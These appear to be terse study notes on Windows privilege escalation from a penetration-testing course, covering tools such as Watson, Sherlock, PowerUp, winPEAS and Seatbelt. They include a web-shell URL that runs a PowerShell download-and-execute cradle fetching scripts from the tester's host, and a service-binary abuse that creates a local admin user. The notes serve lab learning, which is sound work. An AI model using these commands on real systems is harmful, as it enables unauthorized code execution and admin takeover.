Check targets .NET version and Build that Version in VisualStudio
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build > Your version: OSx86
\\10.10.14.34\share\Watson.exe
Watson Found 5 Vulns
Including: MS11-046
Sherlock
locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1 ..fixed some bad unicode (at beginning)
vim Sherlock.ps1
Find-AllVulns ..add as last line
http://10.x.x.x/ippsec.php?fexec=
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -
Found:
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and race-condition ..lets ignore
UACME
Tries 30+ ways to PrivEsc
"You AC Me Bro"
UAC Bypass
User Account Control
Metasploit has 'bypassuac' for Windows7
PowerShell Empire that prompts in a nice way
BeRoot
Check for misconfigs in Win or Linux
C:\Tools\beRoot.exe
Found lots of vulns for PrivEsc
PowerUp Scan
Powershell script to find PrivEsc Vulns and Exploit
PowerShell > PowerShellEmpire > PowerUp.ps1
locate PowerUp.ps1 (empire)
cp PowerUp.ps1 .
vim 'Invoke-AllChecks' ..Add as last line
python -m SimpleHTTPServer
Send to Victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -
Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an ..3306 mysql, but not oracle (1521)
PowerUp Abuse
Abuse functions ..
Write-UserAddMSI
Write-ServiceBinary .. Will create user 'john' with password123 as admin!
locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer ..Share
Send the file to victim ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -
PS> Import-Module .\PowerUp.ps1 ..run as Admin if you can
PS> Invoke-AllChecks ..Scan
----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe
Exploit:
Will create a new user 'john' with Password 123! and Local Admin!
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath ""C:\Program Files\VideoStream\1337.exe""
SharpUp
win ps or cmd:
> SharpUp.exe
Seatbelt
Enumeration but doesnt hunt for privesc
Seatbelt.exe ...help
Seatbelt.exe all
Seatbelt.exe NonstandardServices
winPEAS
Hunts for privesc, highlights
Most powerful tool in this course!
Most maintained tool
Enums failing?
couldnt get watson or winPEAS.exe to work
.NET might be OLD
Example: 'Granny' had v1.0 .NET
> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"
Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437
---------------------------------
---------------------------------
Use the .bat instead!
C:\Temp>winPEAS.bat
winPEAS.bat
Nothing happened?
Prefixing it with cmd /k worked.
If you check cmd /?, the /k switch Carries out the command specified by string but remains.
I suspect cmd /c would work as well but never tried that.
C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
cmd /k winPEAS.bat > output.txt
Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...
More...
MS10-059 =
..for recent windows
USE:
SeImpersonatePrivilege
Allows impersonate Ex: \
SeAssignPrimaryPrivilege
Similar. Enables user to assign access token to new proc.
Ex:
Example from
SharpUp - Good if you dont have PowerShell
C# Compiled version: